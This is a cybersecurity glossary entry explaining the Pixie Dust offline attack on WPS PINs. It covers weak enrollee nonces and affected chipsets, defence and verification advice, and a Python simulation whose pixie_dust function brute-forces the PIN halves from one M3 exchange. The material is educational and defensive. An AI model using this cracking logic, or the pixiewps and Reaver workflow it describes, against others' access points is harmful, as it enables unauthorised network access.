Pixie Dust Attack
What is Pixie Dust Attack?
Pixie Dust Attack: An offline attack that recovers the WPS PIN of a vulnerable access point in seconds by exploiting weak nonces in the WPS registration protocol.
The Pixie Dust attack was published in 2014 by Dominique Bongard. In WPS PIN registration the access point (acting as enrollee) sends M1 with its nonce N1 and Diffie-Hellman public key PKe, the registrar replies in M2 with N2 and PKr, and the access point then sends M3 containing E-Hash1 and E-Hash2. Those hashes are HMAC-SHA256 values over the two halves of the PIN, keyed with AuthKey (derived from the Diffie-Hellman shared secret) and salted with two secret 128-bit nonces, E-S1 and E-S2. The construction only hides the PIN halves if those nonces are unpredictable. Bongard observed that many access points generate E-S1 and E-S2 with a weak or non-existent pseudo-random number generator: some Ralink builds use all zeros, and some Broadcom and Realtek builds use a linear congruential generator or a time-seeded rand() from which the nonces can be reconstructed given N1. An attacker who runs a single M1-M3 exchange as the registrar knows its own Diffie-Hellman private key and therefore AuthKey, can guess or derive E-S1 and E-S2, and can brute-force the first PIN half (10,000 candidates) and the second half (1,000 candidates, since the last digit is a checksum) entirely offline in seconds to minutes, without sending any further frames to the access point. Tools such as pixiewps and Reaver's -K (Pixie Dust) mode automate this. Chipsets from Ralink (now MediaTek), Broadcom and Realtek were widely affected. The fix is to disable WPS, or to upgrade to firmware that generates the nonces with a cryptographically strong PRNG.
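The exchange described above, modelled end to end in Python as an added example (this is not code from the page, from Bongard's research or from pixiewps): the access point side derives E-Hash1/E-Hash2 for message M3 either with proper random nonces or with the all-zero E-S1/E-S2 of the affected Ralink firmware, and the attacker side, having played registrar and therefore holding its own Diffie-Hellman private key, derives AuthKey and recovers both PIN halves offline. The Diffie-Hellman group is the 1536-bit MODP group from RFC 3526 that WPS specifies; the enrollee MAC, the PIN and the function names (`wps_kdf`, `derive_authkey`, `enrollee_m3`, `pixie_dust`, `run_exchange`) are this example's own constructions. Only the zero-nonce case is modelled; the LCG and time-seeded variants differ only in how the nonce guess is produced.

```python
"""Pixie Dust against a WPS enrollee with a broken nonce generator (constructed example)."""
import hashlib
import hmac
import secrets

# 1536-bit MODP group (RFC 3526 group 5), the group WPS uses for PKe/PKr.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
    "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
    "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
    "670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF", 16)
G = 2
KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"


def wps_kdf(kdk: bytes) -> bytes:
    """WPS KDF: 640 bits = AuthKey(256) | KeyWrapKey(128) | EMSK(256)."""
    out = b"".join(
        hmac.new(kdk, i.to_bytes(4, "big") + KDF_LABEL + (640).to_bytes(4, "big"),
                 hashlib.sha256).digest()
        for i in (1, 2, 3))
    return out[:80]


def derive_authkey(priv: int, peer_pub: int, n1: bytes, mac_e: bytes, n2: bytes) -> bytes:
    """DHKey = SHA-256(g^ab mod p); KDK = HMAC(DHKey, N1 | MAC_E | N2); AuthKey = KDF[0:32]."""
    shared = pow(peer_pub, priv, P).to_bytes(192, "big")
    dhkey = hashlib.sha256(shared).digest()
    kdk = hmac.new(dhkey, n1 + mac_e + n2, hashlib.sha256).digest()
    return wps_kdf(kdk)[:32]


def psk_half(authkey: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2 = first 128 bits of HMAC-SHA256(AuthKey, ASCII digits of the PIN half)."""
    return hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S | PSK | PKe | PKr)."""
    return hmac.new(authkey, e_s + psk + pke + pkr, hashlib.sha256).digest()


def pin_checksum(first7: str) -> str:
    """Eighth WPS PIN digit: checksum over the first seven with weights 3,1,3,1,3,1,3."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return str((10 - acc % 10) % 10)


def enrollee_m3(pin: str, pke: bytes, pkr: bytes, authkey: bytes, weak_prng: bool):
    """Access point side of M3. Sound firmware uses two fresh 128-bit random nonces;
    the broken firmware modelled here (zero PRNG, as in affected Ralink builds) uses 0."""
    if weak_prng:
        e_s1 = e_s2 = bytes(16)
    else:
        e_s1, e_s2 = secrets.token_bytes(16), secrets.token_bytes(16)
    return (e_hash(authkey, e_s1, psk_half(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, e_s2, psk_half(authkey, pin[4:]), pke, pkr))


def pixie_dust(authkey, pke, pkr, ehash1, ehash2, es1_guess=bytes(16), es2_guess=bytes(16)):
    """Offline PIN recovery from one M3, given AuthKey (the attacker chose PKr) and a
    guess for E-S1/E-S2. Defaults model all-zero nonces. Returns the PIN or None."""
    first = None
    for i in range(10_000):                       # first half: 4 free digits
        half = f"{i:04d}"
        if e_hash(authkey, es1_guess, psk_half(authkey, half), pke, pkr) == ehash1:
            first = half
            break
    if first is None:
        return None
    for j in range(1_000):                        # second half: 3 digits + checksum
        second = f"{j:03d}"
        second += pin_checksum(first + second)
        if e_hash(authkey, es2_guess, psk_half(authkey, second), pke, pkr) == ehash2:
            return first + second
    return None


def run_exchange(pin: str, weak_prng: bool):
    """One M1-M3 registration between the access point (enrollee) and the attacker (registrar)."""
    mac_e = bytes.fromhex("001122334455")         # constructed enrollee MAC
    # M1: the access point sends N1 and PKe, keeping private key a.
    a = secrets.randbelow(P - 2) + 1
    n1, pke = secrets.token_bytes(16), pow(G, a, P).to_bytes(192, "big")
    # M2: the attacker answers with N2 and PKr, keeping private key b. No PIN needed so far.
    b = secrets.randbelow(P - 2) + 1
    n2, pkr = secrets.token_bytes(16), pow(G, b, P).to_bytes(192, "big")
    ak_ap = derive_authkey(a, int.from_bytes(pkr, "big"), n1, mac_e, n2)
    ak_attacker = derive_authkey(b, int.from_bytes(pke, "big"), n1, mac_e, n2)
    assert ak_ap == ak_attacker                   # both sides share AuthKey
    # M3: the access point commits to the PIN halves; the attacker then goes offline.
    ehash1, ehash2 = enrollee_m3(pin, pke, pkr, ak_ap, weak_prng)
    return pixie_dust(ak_attacker, pke, pkr, ehash1, ehash2)


if __name__ == "__main__":
    print("weak PRNG  :", run_exchange("12345670", weak_prng=True))
    print("strong PRNG:", run_exchange("12345670", weak_prng=False))
```

With the zero-nonce firmware the full PIN comes back after at most 11,000 HMAC comparisons; with properly random E-S1/E-S2 the same search exhausts every candidate and returns nothing, which is the whole security argument of the M3 construction. This is also why disabling WPS or fixing the PRNG is the remedy: the hashes themselves are not the flaw.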
● Examples
- 01
Running a single M1-M3 WPS exchange against the access point, then handing PKe, PKr, E-Hash1, E-Hash2, AuthKey and the enrollee nonce to pixiewps, which recovers the PIN offline in under 30 seconds.
- 02
Reaver's -K (Pixie Dust) mode breaking a Ralink-based access point after one registration attempt, without iterating through online PIN guesses.
● Frequently asked questions
What is Pixie Dust Attack?
An offline attack that recovers the WPS PIN of a vulnerable access point in seconds by exploiting weak nonces in the WPS registration protocol. It belongs to the Attacks & Threats category of cybersecurity.
What does Pixie Dust Attack mean?
An offline attack that recovers the WPS PIN of a vulnerable access point in seconds by exploiting weak nonces in the WPS registration protocol.
How does Pixie Dust Attack work?
The Pixie Dust attack was published in 2014 by Dominique Bongard. In WPS PIN registration the access point (acting as enrollee) sends M1 with its nonce N1 and Diffie-Hellman public key PKe, the registrar replies in M2 with N2 and PKr, and the access point then sends M3 containing E-Hash1 and E-Hash2. Those hashes are HMAC-SHA256 values over the two halves of the PIN, keyed with AuthKey (derived from the Diffie-Hellman shared secret) and salted with two secret 128-bit nonces, E-S1 and E-S2. The construction only hides the PIN halves if those nonces are unpredictable. Bongard observed that many access points generate E-S1 and E-S2 with a weak or non-existent pseudo-random number generator: some Ralink builds use all zeros, and some Broadcom and Realtek builds use a linear congruential generator or a time-seeded rand() from which the nonces can be reconstructed given N1. An attacker who runs a single M1-M3 exchange as the registrar knows its own Diffie-Hellman private key and therefore AuthKey, can guess or derive E-S1 and E-S2, and can brute-force the first PIN half (10,000 candidates) and the second half (1,000 candidates, since the last digit is a checksum) entirely offline in seconds to minutes, without sending any further frames to the access point. Tools such as pixiewps and Reaver's -K (Pixie Dust) mode automate this. Chipsets from Ralink (now MediaTek), Broadcom and Realtek were widely affected. The fix is to disable WPS, or to upgrade to firmware that generates the nonces with a cryptographically strong PRNG.
How do you defend against Pixie Dust Attack?
Disable WPS on every access point you control, the PIN method in particular, or install vendor firmware that generates E-S1 and E-S2 with a cryptographically strong random number generator. Then verify rather than assume: an access point with WPS still active advertises it in its beacons and probe responses, so scan with a WPS survey tool such as wash (shipped with Reaver) after changing the setting, and run pixiewps against your own access points to confirm that the PIN can no longer be recovered from a single M1-M3 exchange. Treat the WPS PIN as a credential that protects the WPA/WPA2 passphrase: once it is recovered, the passphrase follows immediately.
What are other names for Pixie Dust Attack?
Common alternative names include: Pixie-Dust attack, offline WPS PIN attack. pixiewps is the name of the tool that implements the attack and is often used as shorthand for it.
● Related terms
- attacks№ 1251
WPS Attack
An online brute-force attack on the eight-digit Wi-Fi Protected Setup PIN that recovers the WPA/WPA2 passphrase in hours.
- network-security№ 1249
WPA2
The second generation of Wi-Fi Protected Access, based on AES-CCMP and IEEE 802.11i, that has been the de facto Wi-Fi security standard since 2004.
- attacks№ 595
KRACK Attack
A key reinstallation attack against WPA2 that forces nonce reuse in the four-way handshake, letting an attacker decrypt or replay Wi-Fi traffic.
- attacks№ 837
PMKID Attack
An offline WPA/WPA2-PSK cracking method that derives the passphrase from a single PMKID field captured from an access point, no client needed.
- attacks№ 943
Rogue Access Point
An unauthorised wireless access point connected to a network, either installed maliciously by an attacker or naively by an employee, that bypasses network security controls.